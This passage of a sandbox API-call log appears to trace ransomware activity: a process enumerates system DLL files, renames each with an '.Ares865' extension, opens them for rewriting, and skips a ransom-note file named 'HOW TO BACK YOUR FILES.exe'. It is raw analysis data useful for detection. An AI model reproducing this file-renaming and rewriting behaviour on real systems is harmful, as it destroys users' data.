lpString2="Ares865") returned 1 [0146.196] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc.Ares865") returned 67 [0146.196] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcvbs.inc"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcvbs.inc.ares865"), dwFlags=0x1) returned 1 [0146.199] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\adcvbs.inc.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\adcvbs.inc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.199] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=623) returned 1 [0146.199] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.199] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0146.199] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.203] lstrcpyW (in: lpString1=0x2cce462, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0146.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0146.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6e) returned 0x2e4788 [0146.203] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0146.203] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22c9a97c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0x22c9a97c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0x22c9a97c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x206, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="handler.reg", cAlternateFileName="")) returned 1 [0146.203] lstrcmpiW (lpString1="handler.reg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0146.203] lstrcmpiW (lpString1="handler.reg", lpString2="aoldtz.exe") returned 1 [0146.203] lstrcpyW (in: lpString1=0x2cce462, lpString2="handler.reg" | out: lpString1="handler.reg") returned="handler.reg" [0146.203] lstrlenW (lpString="handler.reg") returned 11 [0146.203] lstrlenW (lpString="Ares865") returned 7 [0146.203] lstrcmpiW (lpString1="ler.reg", lpString2="Ares865") returned 1 [0146.203] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg.Ares865") returned 68 [0146.203] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handler.reg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handler.reg.ares865"), dwFlags=0x1) returned 1 [0146.205] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handler.reg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.205] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=518) returned 1 [0146.205] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.205] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.206] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.209] lstrcpyW (in: lpString1=0x2cce462, lpString2="handsafe.reg" | out: lpString1="handsafe.reg") returned="handsafe.reg" [0146.209] lstrlenW (lpString="handsafe.reg") returned 12 [0146.209] lstrlenW (lpString="Ares865") returned 7 [0146.209] lstrcmpiW (lpString1="afe.reg", lpString2="Ares865") returned -1 [0146.209] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg.Ares865") returned 69 [0146.209] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handsafe.reg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handsafe.reg.ares865"), dwFlags=0x1) returned 1 [0146.213] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handsafe.reg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.213] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=588) returned 1 [0146.213] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.213] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.213] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.217] lstrcpyW (in: lpString1=0x2cce462, lpString2="msadce.dll" | out: lpString1="msadce.dll") returned="msadce.dll" [0146.217] lstrlenW (lpString="msadce.dll") returned 10 [0146.217] lstrlenW (lpString="Ares865") returned 7 [0146.217] lstrcmpiW (lpString1="dce.dll", lpString2="Ares865") returned 1 [0146.218] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll.Ares865") returned 67 [0146.218] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadce.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadce.dll.ares865"), dwFlags=0x1) returned 1 [0146.221] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadce.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.221] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=561152) returned 1 [0146.221] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.221] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.221] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.376] lstrcpyW (in: lpString1=0x2cce462, lpString2="msadcer.dll" | out: lpString1="msadcer.dll") returned="msadcer.dll" [0146.376] lstrlenW (lpString="msadcer.dll") returned 11 [0146.376] lstrlenW (lpString="Ares865") returned 7 [0146.376] lstrcmpiW (lpString1="cer.dll", lpString2="Ares865") returned 1 [0146.376] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll.Ares865") returned 68 [0146.376] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcer.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcer.dll.ares865"), dwFlags=0x1) returned 1 [0146.379] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcer.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.379] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0146.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.383] lstrcpyW (in: lpString1=0x2cce462, lpString2="msadcf.dll" | out: lpString1="msadcf.dll") returned="msadcf.dll" [0146.383] lstrlenW (lpString="msadcf.dll") returned 10 [0146.383] lstrlenW (lpString="Ares865") returned 7 [0146.383] lstrcmpiW (lpString1="dcf.dll", lpString2="Ares865") returned 1 [0146.384] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll.Ares865") returned 67 [0146.384] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcf.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcf.dll.ares865"), dwFlags=0x1) returned 1 [0146.387] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcf.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcf.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.387] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94208) returned 1 [0146.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.448] lstrcmpiW (lpString1="msadcfr.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0146.448] lstrcmpiW (lpString1="msadcfr.dll", lpString2="aoldtz.exe") returned 1 [0146.449] lstrcpyW (in: lpString1=0x2cce462, lpString2="msadcfr.dll" | out: lpString1="msadcfr.dll") returned="msadcfr.dll" [0146.449] lstrlenW (lpString="msadcfr.dll") returned 11 [0146.449] lstrlenW (lpString="Ares865") returned 7 [0146.449] lstrcmpiW (lpString1="cfr.dll", lpString2="Ares865") returned 1 [0146.449] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll.Ares865") returned 68 [0146.449] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcfr.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcfr.dll.ares865"), dwFlags=0x1) returned 1 [0146.452] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcfr.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.452] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0146.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.455] lstrcpyW (in: lpString1=0x2cce462, lpString2="msadco.dll" | out: lpString1="msadco.dll") returned="msadco.dll" [0146.455] lstrlenW (lpString="msadco.dll") returned 10 [0146.455] lstrlenW (lpString="Ares865") returned 7 [0146.455] lstrcmpiW (lpString1="dco.dll", lpString2="Ares865") returned 1 [0146.456] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll.Ares865") returned 67 [0146.456] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadco.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadco.dll.ares865"), dwFlags=0x1) returned 1 [0146.460] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadco.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.461] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=212992) returned 1 [0146.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.532] lstrcpyW (in: lpString1=0x2cce462, lpString2="msadcor.dll" | out: lpString1="msadcor.dll") returned="msadcor.dll" [0146.532] lstrlenW (lpString="msadcor.dll") returned 11 [0146.532] lstrlenW (lpString="Ares865") returned 7 [0146.532] lstrcmpiW (lpString1="cor.dll", lpString2="Ares865") returned 1 [0146.532] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll.Ares865") returned 68 [0146.532] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcor.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcor.dll.ares865"), dwFlags=0x1) returned 1 [0146.534] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcor.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.535] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0146.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.539] lstrcpyW (in: lpString1=0x2cce462, lpString2="msadcs.dll" | out: lpString1="msadcs.dll") returned="msadcs.dll" [0146.539] lstrlenW (lpString="msadcs.dll") returned 10 [0146.539] lstrlenW (lpString="Ares865") returned 7 [0146.539] lstrcmpiW (lpString1="dcs.dll", lpString2="Ares865") returned 1 [0146.539] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll.Ares865") returned 67 [0146.539] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcs.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcs.dll.ares865"), dwFlags=0x1) returned 1 [0146.541] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcs.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcs.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.541] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=81920) returned 1 [0146.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.547] lstrcpyW (in: lpString1=0x2cce462, lpString2="msadds.dll" | out: lpString1="msadds.dll") returned="msadds.dll" [0146.547] lstrlenW (lpString="msadds.dll") returned 10 [0146.548] lstrlenW (lpString="Ares865") returned 7 [0146.548] lstrcmpiW (lpString1="dds.dll", lpString2="Ares865") returned 1 [0146.548] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll.Ares865") returned 67 [0146.548] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadds.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadds.dll.ares865"), dwFlags=0x1) returned 1 [0146.549] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadds.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.550] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=241664) returned 1 [0146.550] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.550] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.550] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.574] lstrcpyW (in: lpString1=0x2cce462, lpString2="msaddsr.dll" | out: lpString1="msaddsr.dll") returned="msaddsr.dll" [0146.574] lstrlenW (lpString="msaddsr.dll") returned 11 [0146.574] lstrlenW (lpString="Ares865") returned 7 [0146.574] lstrcmpiW (lpString1="dsr.dll", lpString2="Ares865") returned 1 [0146.574] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll.Ares865") returned 68 [0146.574] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msaddsr.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msaddsr.dll.ares865"), dwFlags=0x1) returned 1 [0146.577] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msaddsr.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msaddsr.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.577] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0146.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.580] lstrcpyW (in: lpString1=0x2cce462, lpString2="msdaprsr.dll" | out: lpString1="msdaprsr.dll") returned="msdaprsr.dll" [0146.580] lstrlenW (lpString="msdaprsr.dll") returned 12 [0146.580] lstrlenW (lpString="Ares865") returned 7 [0146.580] lstrcmpiW (lpString1="rsr.dll", lpString2="Ares865") returned 1 [0146.580] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll.Ares865") returned 69 [0146.580] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprsr.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprsr.dll.ares865"), dwFlags=0x1) returned 1 [0146.582] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprsr.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.582] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0146.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.586] lstrcpyW (in: lpString1=0x2cce462, lpString2="msdaprst.dll" | out: lpString1="msdaprst.dll") returned="msdaprst.dll" [0146.586] lstrlenW (lpString="msdaprst.dll") returned 12 [0146.586] lstrlenW (lpString="Ares865") returned 7 [0146.586] lstrcmpiW (lpString1="rst.dll", lpString2="Ares865") returned 1 [0146.587] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll.Ares865") returned 69 [0146.587] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprst.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprst.dll.ares865"), dwFlags=0x1) returned 1 [0146.588] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprst.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprst.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=286720) returned 1 [0146.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.642] lstrcpyW (in: lpString1=0x2cce462, lpString2="msdarem.dll" | out: lpString1="msdarem.dll") returned="msdarem.dll" [0146.642] lstrlenW (lpString="msdarem.dll") returned 11 [0146.642] lstrlenW (lpString="Ares865") returned 7 [0146.642] lstrcmpiW (lpString1="rem.dll", lpString2="Ares865") returned 1 [0146.643] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll.Ares865") returned 68 [0146.643] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdarem.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdarem.dll.ares865"), dwFlags=0x1) returned 1 [0146.646] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdarem.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdarem.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.646] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=192512) returned 1 [0146.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0146.664] lstrcpyW (in: lpString1=0x2cce462, lpString2="msdaremr.dll" | out: lpString1="msdaremr.dll") returned="msdaremr.dll" [0146.664] lstrlenW (lpString="msdaremr.dll") returned 12 [0146.664] lstrlenW (lpString="Ares865") returned 7 [0146.664] lstrcmpiW (lpString1="emr.dll", lpString2="Ares865") returned 1 [0146.665] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll.Ares865") returned 69 [0146.665] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaremr.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaremr.dll.ares865"), dwFlags=0x1) returned 1 [0146.671] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaremr.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaremr.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0146.671] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0146.671] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0146.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0146.672] 